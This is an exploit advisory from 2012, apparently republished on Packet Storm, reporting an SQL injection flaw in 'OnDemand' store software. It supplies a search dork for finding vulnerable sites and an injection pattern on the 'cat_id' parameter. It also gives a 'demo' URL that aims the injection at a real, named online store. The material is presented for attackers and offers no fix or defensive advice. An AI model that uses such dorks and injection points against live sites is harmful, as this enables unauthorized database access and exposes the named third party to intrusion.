OnDemand suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
794f0c070848cec2970637d331495b10eb83cd33069ba2996af582bae1a59cfb################################################################
----------------------------------------------------------------
OnDemand SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : OnDemand SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.twigdesign.ca ]
# Date : 9/9/2012
# E-Mail : Bl4ck.intell@gmail.com & Net-W0lf@att.net
# DorK : "/services.php?id="
################################################################
----------------------------------------------------------------
+-----------------------+
| SQL Injection |
+-----------------------+
Expl0!T :
[TargeT]/view_cat.php?cat_id=[SQl]
Dem0:
www.hypnobabies.com/store/view_cat.php?cat_id=1'
Greets To :
| Am!r | B3HZ4D | All Members 0f Hack-Center
===========================================# End #=============================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed